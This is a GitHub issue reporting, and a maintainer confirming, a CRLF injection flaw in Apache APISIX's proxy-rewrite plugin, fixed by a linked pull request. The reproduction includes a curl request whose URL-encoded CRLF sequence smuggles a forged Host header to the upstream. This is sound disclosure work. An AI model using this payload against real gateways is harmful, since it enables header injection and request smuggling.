Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

bug: The proxy-rewrite plugin may cause CRLF injection vulnerabilities #8877

Closed
zuiyangqingzhou opened this issue Feb 17, 2023 · 1 comment · Fixed by #8888
Closed

bug: The proxy-rewrite plugin may cause CRLF injection vulnerabilities #8877

zuiyangqingzhou opened this issue Feb 17, 2023 · 1 comment · Fixed by #8888
Assignees
@spacewander
Labels
bug Something isn't working

Comments

@zuiyangqingzhou
Copy link
Contributor

Current Behavior

  1. Openresty as the upstream, the configuration file is as follows
pid logs/nginx.pid;
events {
    worker_connections 1024;
}

http {
    server {
        listen 8866;
        location / {
	    content_by_lua '
	    	ngx.say(ngx.var.host)
	    ';
        }
    }
}
  1. Do not enable the proxy-rewrite plugin
curl "http://test-limit.com:9080/limit/aa%3f0z=700%20HTTP/1.1%0D%0AHost:google.com%0d%0a%0d%0a" -i 

## output:

HTTP/1.1 200 OK
Content-Type: text/plain; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Date: Fri, 17 Feb 2023 04:07:49 GMT
Server: Openresty

test-limit.com
  1. Enable the proxy-rewrite plugin
## the proxy-rewrite plugin configuration file is as follows
proxy-rewrite: {
      "host": "test.xxxx.com"
},

curl "http://test-limit.com:9080/limit/aa%3f0z=700%20HTTP/1.1%0D%0AHost:google.com%0d%0a%0d%0a" -i

## output
HTTP/1.1 200 OK
Content-Type: text/plain; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Date: Fri, 17 Feb 2023 04:24:42 GMT
Server: Openresty

google.com

Expected Behavior

The host obtained by upstream should not be rewritten as google.com, which can lead to malicious attacks

Error Logs

none

Steps to Reproduce

  1. Openresty as the upstream, the configuration file is as follows
pid logs/nginx.pid;
events {
    worker_connections 1024;
}

http {
    server {
        listen 8866;
        location / {
	    content_by_lua '
	    	ngx.say(ngx.var.host)
	    ';
        }
    }
}
  1. Do not enable the proxy-rewrite plugin
curl "http://test-limit.com:9080/limit/aa%3f0z=700%20HTTP/1.1%0D%0AHost:google.com%0d%0a%0d%0a" -i 

## output:

HTTP/1.1 200 OK
Content-Type: text/plain; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Date: Fri, 17 Feb 2023 04:07:49 GMT
Server: Openresty

test-limit.com
  1. Enable the proxy-rewrite plugin
## the proxy-rewrite plugin configuration file is as follows
proxy-rewrite: {
      "host": "test.xxxx.com"
},

curl "http://test-limit.com:9080/limit/aa%3f0z=700%20HTTP/1.1%0D%0AHost:google.com%0d%0a%0d%0a" -i

## output
HTTP/1.1 200 OK
Content-Type: text/plain; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Date: Fri, 17 Feb 2023 04:24:42 GMT
Server: Openresty

google.com

Environment

  • APISIX version (run apisix version): 2.10.5
  • Operating system (run uname -a): amzn2.x86_64
  • OpenResty / Nginx version (run openresty -V or nginx -V): nginx version: openresty/1.19.9.1
  • etcd version, if relevant (run curl http://127.0.0.1:9090/v1/server_info): 3.5
  • APISIX Dashboard version, if relevant:
  • Plugin runner version, for issues related to plugin runners:
  • LuaRocks version, for installation issues (run luarocks --version):
@spacewander spacewander added the bug Something isn't working label Feb 20, 2023
@spacewander
Copy link
Member

Thanks for your report! I can reproduce it with the latest version.

@spacewander spacewander self-assigned this Feb 20, 2023
@spacewander spacewander mentioned this issue Feb 20, 2023
Merged
5 tasks
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees

@spacewander spacewander

Labels
bug Something isn't working
Projects
None yet
Milestone
No milestone
Development

Successfully merging a pull request may close this issue.

fix(proxy-rewrite): escape args part if it's not from user conf spacewander/incubator-apisix
2 participants
@spacewander @zuiyangqingzhou